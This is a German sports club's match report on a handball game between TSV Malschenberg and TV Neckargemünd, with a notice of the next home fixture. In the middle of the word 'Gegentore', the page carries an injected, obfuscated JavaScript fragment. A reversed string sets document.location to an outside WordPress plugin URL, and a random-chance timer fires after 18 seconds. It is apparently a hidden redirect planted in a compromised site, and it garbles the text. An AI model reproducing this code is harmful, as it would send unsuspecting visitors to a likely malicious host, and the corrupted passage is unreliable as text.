TSV Malschenberg vs. TV Neckargemünd


Am vergangenen Sonntag hieß der Gegner im Auswärtsspiel Malschenberg. Mit
leicht reduziertem Aufgebot starteten unsere Herren ins Spiel.
Der Gastgeber kam besser ins Spiel und so konnte sich Malschenberg leicht
absetzen. 11 Spielminute Auszeit für Neckargemünd (8:4) Durch eine kämpferisch
engaschierte Leistung wurde der Abstand verkürzt und sogar mit einer Führung
verwandelt. Motiviert vom Spielstand ging es in die Halbzeit.
Halbzeitstand 11:13
Nach der Halbzeit ging es erst gut los, doch dann kam der Einbruch. Jetzt machte
sich die angespannte Spieler Decke sichtbar. Nach ca. 41 gespielten Minuten ging
unsere Herren die Luft aus. (46 min 20:19) Malschenberg übernahm die Führung.
Fehler im Angriffsspiel sorgten für einfache Gegentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tore, in den folgenden Minuten
konnten sich die Gastgeber absetzen. Neckargemünd konnte leider nicht mehr ran
kommen. Endstand 31:24

Letztes Spiel dieses Jahr daheim in der Münzenbachhalle:
Sonntag, 4.12.2022 18.30 Uhr
TV Neckargemünd vs.HC Mannheim-Vogelstang

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert